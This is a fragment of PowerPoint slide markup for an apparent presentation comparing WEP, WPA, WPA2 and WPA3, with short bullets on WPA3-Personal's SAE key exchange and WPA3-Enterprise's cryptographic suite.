          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="146261" y="3116360"/>
            <a:ext cx="4389120" cy="3256119"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 21600"/>
              <a:gd name="T1" fmla="*/ 19956 h 21600"/>
              <a:gd name="T2" fmla="*/ 0 w 21600"/>
              <a:gd name="T3" fmla="*/ 1644 h 21600"/>
              <a:gd name="T4" fmla="*/ 2087 w 21600"/>
              <a:gd name="T5" fmla="*/ 0 h 21600"/>
              <a:gd name="T6" fmla="*/ 19513 w 21600"/>
              <a:gd name="T7" fmla="*/ 0 h 21600"/>
              <a:gd name="T8" fmla="*/ 21600 w 21600"/>
              <a:gd name="T9" fmla="*/ 1644 h 21600"/>
              <a:gd name="T10" fmla="*/ 21600 w 21600"/>
              <a:gd name="T11" fmla="*/ 19956 h 21600"/>
              <a:gd name="T12" fmla="*/ 19513 w 21600"/>
              <a:gd name="T13" fmla="*/ 21600 h 21600"/>
              <a:gd name="T14" fmla="*/ 2087 w 21600"/>
              <a:gd name="T15" fmla="*/ 21600 h 21600"/>
              <a:gd name="T16" fmla="*/ 0 w 21600"/>
              <a:gd name="T17" fmla="*/ 19956 h 21600"/>
              <a:gd name="T18" fmla="*/ 0 w 21600"/>
              <a:gd name="T19" fmla="*/ 19956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600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="19956"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1644"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="736"/>
                  <a:pt x="934" y="0"/>
                  <a:pt x="2087" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19513" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20666" y="0"/>
                  <a:pt x="21600" y="736"/>
                  <a:pt x="21600" y="1644"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="19956"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="20864"/>
                  <a:pt x="20666" y="21600"/>
                  <a:pt x="19513" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2087" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="934" y="21600"/>
                  <a:pt x="0" y="20864"/>
                  <a:pt x="0" y="19956"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="19956"/>
                </a:moveTo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txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="609631">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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2" name="AutoShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{659F930F-8A5E-4CF1-A136-3BBA75FAA589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="3110675"/>
            <a:ext cx="4389120" cy="3256119"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 21600"/>
              <a:gd name="T1" fmla="*/ 19956 h 21600"/>
              <a:gd name="T2" fmla="*/ 0 w 21600"/>
              <a:gd name="T3" fmla="*/ 1644 h 21600"/>
              <a:gd name="T4" fmla="*/ 2087 w 21600"/>
              <a:gd name="T5" fmla="*/ 0 h 21600"/>
              <a:gd name="T6" fmla="*/ 19513 w 21600"/>
              <a:gd name="T7" fmla="*/ 0 h 21600"/>
              <a:gd name="T8" fmla="*/ 21600 w 21600"/>
              <a:gd name="T9" fmla="*/ 1644 h 21600"/>
              <a:gd name="T10" fmla="*/ 21600 w 21600"/>
              <a:gd name="T11" fmla="*/ 19956 h 21600"/>
              <a:gd name="T12" fmla="*/ 19513 w 21600"/>
              <a:gd name="T13" fmla="*/ 21600 h 21600"/>
              <a:gd name="T14" fmla="*/ 2087 w 21600"/>
              <a:gd name="T15" fmla="*/ 21600 h 21600"/>
              <a:gd name="T16" fmla="*/ 0 w 21600"/>
              <a:gd name="T17" fmla="*/ 19956 h 21600"/>
              <a:gd name="T18" fmla="*/ 0 w 21600"/>
              <a:gd name="T19" fmla="*/ 19956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600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="19956"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1644"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="736"/>
                  <a:pt x="934" y="0"/>
                  <a:pt x="2087" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19513" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20666" y="0"/>
                  <a:pt x="21600" y="736"/>
                  <a:pt x="21600" y="1644"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="19956"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="20864"/>
                  <a:pt x="20666" y="21600"/>
                  <a:pt x="19513" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2087" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="934" y="21600"/>
                  <a:pt x="0" y="20864"/>
                  <a:pt x="0" y="19956"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="19956"/>
                </a:moveTo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txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="609631">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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9C8EF50A-EC0A-4E8E-9763-95E4023F7068}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220101" y="3328278"/>
            <a:ext cx="2390975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WPA3 - Personal</a:t>
            </a:r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686F4C8A-73B3-43D3-86EE-8108ED7FF2B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5710983" y="3328278"/>
            <a:ext cx="2568355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WPA3 - Enterprise</a:t>
            </a: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5BB140E2-4613-443E-9691-174CCEF037A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259360" y="3807226"/>
            <a:ext cx="4084040" cy="181588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65125" marR="0" lvl="1" indent="-365125" algn="just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IN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is mainly used to deliver </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IN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password-based authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IN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using the 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SAE protocol, also known as Dragonfly Key Exchange.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365125" marR="0" lvl="1" indent="-365125" algn="just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is resistant to offline dictionary attacks and key recovery attacks.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-IN" sz="1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87BF63AC-0E8E-4365-9EF2-292C334DF2BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4838935" y="3807226"/>
            <a:ext cx="4076465" cy="223138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65125" marR="0" lvl="0" indent="-365125" algn="just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protects sensitive data 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using many cryptographic algorithms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365125" marR="0" lvl="0" indent="-365125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provides authenticated encryption using GCMP-256.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365125" marR="0" lvl="0" indent="-365125" algn="just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uses HMAC-SHA-384 to generate cryptographic keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365125" marR="0" lvl="0" indent="-365125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uses ECDSA-384 for exchanging keys.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-IN" sz="1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4" name="Oval 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D52DA9B8-9E1D-4990-BBDD-30FBBA903088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1371600"/>
            <a:ext cx="745407" cy="745407"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="60000"/>
              <a:lumOff val="4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86" name="Freeform 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD76F061-14C4-409A-B5F2-5AF9C8FAB6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921" y="1547007"/>
            <a:ext cx="404765" cy="394592"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 51370 w 462"/>
              <a:gd name="T1" fmla="*/ 67883 h 452"/>
              <a:gd name="T2" fmla="*/ 83086 w 462"/>
              <a:gd name="T3" fmla="*/ 43607 h 452"/>
              <a:gd name="T4" fmla="*/ 83086 w 462"/>
              <a:gd name="T5" fmla="*/ 31469 h 452"/>
              <a:gd name="T6" fmla="*/ 19655 w 462"/>
              <a:gd name="T7" fmla="*/ 39561 h 452"/>
              <a:gd name="T8" fmla="*/ 51370 w 462"/>
              <a:gd name="T9" fmla="*/ 67883 h 452"/>
              <a:gd name="T10" fmla="*/ 27695 w 462"/>
              <a:gd name="T11" fmla="*/ 87664 h 452"/>
              <a:gd name="T12" fmla="*/ 11614 w 462"/>
              <a:gd name="T13" fmla="*/ 55745 h 452"/>
              <a:gd name="T14" fmla="*/ 15634 w 462"/>
              <a:gd name="T15" fmla="*/ 151051 h 452"/>
              <a:gd name="T16" fmla="*/ 27695 w 462"/>
              <a:gd name="T17" fmla="*/ 87664 h 452"/>
              <a:gd name="T18" fmla="*/ 102741 w 462"/>
              <a:gd name="T19" fmla="*/ 15735 h 452"/>
              <a:gd name="T20" fmla="*/ 154558 w 462"/>
              <a:gd name="T21" fmla="*/ 11688 h 452"/>
              <a:gd name="T22" fmla="*/ 67452 w 462"/>
              <a:gd name="T23" fmla="*/ 3596 h 452"/>
              <a:gd name="T24" fmla="*/ 102741 w 462"/>
              <a:gd name="T25" fmla="*/ 15735 h 452"/>
              <a:gd name="T26" fmla="*/ 134456 w 462"/>
              <a:gd name="T27" fmla="*/ 119582 h 452"/>
              <a:gd name="T28" fmla="*/ 110781 w 462"/>
              <a:gd name="T29" fmla="*/ 59342 h 452"/>
              <a:gd name="T30" fmla="*/ 91127 w 462"/>
              <a:gd name="T31" fmla="*/ 55745 h 452"/>
              <a:gd name="T32" fmla="*/ 71472 w 462"/>
              <a:gd name="T33" fmla="*/ 87664 h 452"/>
              <a:gd name="T34" fmla="*/ 134456 w 462"/>
              <a:gd name="T35" fmla="*/ 119582 h 452"/>
              <a:gd name="T36" fmla="*/ 162152 w 462"/>
              <a:gd name="T37" fmla="*/ 147005 h 452"/>
              <a:gd name="T38" fmla="*/ 162152 w 462"/>
              <a:gd name="T39" fmla="*/ 182970 h 452"/>
              <a:gd name="T40" fmla="*/ 174213 w 462"/>
              <a:gd name="T41" fmla="*/ 135317 h 452"/>
              <a:gd name="T42" fmla="*/ 130436 w 462"/>
              <a:gd name="T43" fmla="*/ 135317 h 452"/>
              <a:gd name="T44" fmla="*/ 63431 w 462"/>
              <a:gd name="T45" fmla="*/ 107444 h 452"/>
              <a:gd name="T46" fmla="*/ 47797 w 462"/>
              <a:gd name="T47" fmla="*/ 107444 h 452"/>
              <a:gd name="T48" fmla="*/ 63431 w 462"/>
              <a:gd name="T49" fmla="*/ 195108 h 452"/>
              <a:gd name="T50" fmla="*/ 170192 w 462"/>
              <a:gd name="T51" fmla="*/ 23827 h 452"/>
              <a:gd name="T52" fmla="*/ 122842 w 462"/>
              <a:gd name="T53" fmla="*/ 35515 h 452"/>
              <a:gd name="T54" fmla="*/ 122842 w 462"/>
              <a:gd name="T55" fmla="*/ 47653 h 452"/>
              <a:gd name="T56" fmla="*/ 174213 w 462"/>
              <a:gd name="T57" fmla="*/ 119582 h 452"/>
              <a:gd name="T58" fmla="*/ 205928 w 462"/>
              <a:gd name="T59" fmla="*/ 99352 h 452"/>
              <a:gd name="T60" fmla="*/ 142497 w 462"/>
              <a:gd name="T61" fmla="*/ 147005 h 452"/>
              <a:gd name="T62" fmla="*/ 79066 w 462"/>
              <a:gd name="T63" fmla="*/ 199154 h 452"/>
              <a:gd name="T64" fmla="*/ 146517 w 462"/>
              <a:gd name="T65" fmla="*/ 195108 h 452"/>
              <a:gd name="T66" fmla="*/ 146517 w 462"/>
              <a:gd name="T67" fmla="*/ 151051 h 45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62" h="452">
                <a:moveTo>
                  <a:pt x="115" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="115" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="132"/>
                  <a:pt x="160" y="115"/>
                  <a:pt x="186" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="186" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="53"/>
                  <a:pt x="133" y="44"/>
                  <a:pt x="107" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="44"/>
                  <a:pt x="62" y="62"/>
                  <a:pt x="44" y="88"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="115"/>
                  <a:pt x="71" y="132"/>
                  <a:pt x="89" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="151"/>
                  <a:pt x="107" y="151"/>
                  <a:pt x="115" y="151"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="195"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="62" y="195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="186"/>
                  <a:pt x="62" y="186"/>
                  <a:pt x="71" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="160"/>
                  <a:pt x="35" y="141"/>
                  <a:pt x="26" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="151"/>
                  <a:pt x="0" y="186"/>
                  <a:pt x="0" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="266"/>
                  <a:pt x="9" y="310"/>
                  <a:pt x="35" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="301"/>
                  <a:pt x="54" y="257"/>
                  <a:pt x="71" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="221"/>
                  <a:pt x="62" y="204"/>
                  <a:pt x="62" y="195"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="230" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="230" y="35"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="35"/>
                  <a:pt x="257" y="44"/>
                  <a:pt x="266" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="35"/>
                  <a:pt x="319" y="35"/>
                  <a:pt x="346" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="8"/>
                  <a:pt x="275" y="0"/>
                  <a:pt x="230" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="0"/>
                  <a:pt x="177" y="0"/>
                  <a:pt x="151" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="17"/>
                  <a:pt x="186" y="35"/>
                  <a:pt x="204" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="44"/>
                  <a:pt x="221" y="35"/>
                  <a:pt x="230" y="35"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="301" y="266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="301" y="266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="257"/>
                  <a:pt x="310" y="257"/>
                  <a:pt x="319" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="204"/>
                  <a:pt x="275" y="168"/>
                  <a:pt x="248" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="132"/>
                  <a:pt x="239" y="132"/>
                  <a:pt x="230" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="132"/>
                  <a:pt x="213" y="132"/>
                  <a:pt x="204" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="141"/>
                  <a:pt x="168" y="151"/>
                  <a:pt x="151" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="177"/>
                  <a:pt x="160" y="186"/>
                  <a:pt x="160" y="195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="213"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="239"/>
                  <a:pt x="248" y="257"/>
                  <a:pt x="301" y="266"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="363" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="363" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="336"/>
                  <a:pt x="363" y="354"/>
                  <a:pt x="363" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="372"/>
                  <a:pt x="363" y="389"/>
                  <a:pt x="363" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="380"/>
                  <a:pt x="434" y="336"/>
                  <a:pt x="443" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="301"/>
                  <a:pt x="408" y="301"/>
                  <a:pt x="390" y="301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="390" y="319"/>
                  <a:pt x="381" y="327"/>
                  <a:pt x="363" y="327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="292" y="301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="292"/>
                  <a:pt x="186" y="266"/>
                  <a:pt x="142" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="239"/>
                  <a:pt x="124" y="248"/>
                  <a:pt x="115" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="283"/>
                  <a:pt x="71" y="327"/>
                  <a:pt x="62" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="398"/>
                  <a:pt x="115" y="425"/>
                  <a:pt x="142" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="380"/>
                  <a:pt x="230" y="327"/>
                  <a:pt x="292" y="301"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="381" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="381" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="62"/>
                  <a:pt x="310" y="70"/>
                  <a:pt x="275" y="79"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="283" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="283" y="97"/>
                  <a:pt x="275" y="97"/>
                  <a:pt x="275" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="141"/>
                  <a:pt x="328" y="186"/>
                  <a:pt x="346" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="239"/>
                  <a:pt x="381" y="248"/>
                  <a:pt x="390" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="266"/>
                  <a:pt x="434" y="266"/>
                  <a:pt x="452" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="248"/>
                  <a:pt x="461" y="230"/>
                  <a:pt x="461" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="160"/>
                  <a:pt x="426" y="97"/>
                  <a:pt x="381" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="319" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="319" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="354"/>
                  <a:pt x="213" y="389"/>
                  <a:pt x="177" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="451"/>
                  <a:pt x="213" y="451"/>
                  <a:pt x="230" y="451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="451"/>
                  <a:pt x="292" y="443"/>
                  <a:pt x="328" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="407"/>
                  <a:pt x="337" y="380"/>
                  <a:pt x="337" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337" y="354"/>
                  <a:pt x="337" y="345"/>
                  <a:pt x="328" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="327"/>
                  <a:pt x="319" y="327"/>
                  <a:pt x="319" y="3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lIns="34290" tIns="17145" rIns="34290" bIns="17145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090731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tle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79394DF1-6F20-4EE3-85DC-43D80A20B3A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478029" y="264922"/>
            <a:ext cx="7065772" cy="689436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1828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88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Comparison of WEP, WPA, WPA2, and WPA3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="4294967295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270" r="33270"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7256207" y="-3175"/>
            <a:ext cx="4949288" cy="6333332"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4397 w 4397"/>
              <a:gd name="T1" fmla="*/ 4552 h 4552"/>
              <a:gd name="T2" fmla="*/ 4302 w 4397"/>
              <a:gd name="T3" fmla="*/ 4552 h 4552"/>
              <a:gd name="T4" fmla="*/ 0 w 4397"/>
              <a:gd name="T5" fmla="*/ 0 h 4552"/>
              <a:gd name="T6" fmla="*/ 4397 w 4397"/>
              <a:gd name="T7" fmla="*/ 0 h 4552"/>
              <a:gd name="T8" fmla="*/ 4397 w 4397"/>
              <a:gd name="T9" fmla="*/ 4552 h 4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97" h="4552">
                <a:moveTo>
                  <a:pt x="4397" y="4552"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4302" y="4552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4397" y="4552"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Полилиния 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9832647" y="1065619"/>
            <a:ext cx="2358414" cy="4726766"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 3538167 w 3538167"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 7091243"/>
              <a:gd name="connsiteX1" fmla="*/ 3538167 w 3538167"/>
              <a:gd name="connsiteY1" fmla="*/ 2852601 h 7091243"/>
              <a:gd name="connsiteX2" fmla="*/ 2845147 w 3538167"/>
              <a:gd name="connsiteY2" fmla="*/ 3545621 h 7091243"/>
              <a:gd name="connsiteX3" fmla="*/ 3538167 w 3538167"/>
              <a:gd name="connsiteY3" fmla="*/ 4238641 h 7091243"/>
              <a:gd name="connsiteX4" fmla="*/ 3538167 w 3538167"/>
              <a:gd name="connsiteY4" fmla="*/ 7091243 h 7091243"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 3538167"/>
              <a:gd name="connsiteY5" fmla="*/ 3545622 h 70912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8167" h="7091243">
                <a:moveTo>
                  <a:pt x="3538167" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3538167" y="2852601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2845147" y="3545621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3538167" y="4238641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3538167" y="7091243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3545622"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="9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6" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48538D11-A9D8-4265-B5A8-C65EDE9E8F25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="474373" y="1219200"/>
          <a:ext cx="9355427" cy="3614051"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"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tableStyleId>{00A15C55-8517-42AA-B614-E9B94910E393}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="14306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00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676400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="177603131"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1752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2938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800" b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Encryption</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1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 gridSpan="5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="1828800" rtl="0" eaLnBrk="1" fontAlgn="base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altLang="ko-KR" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attributes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
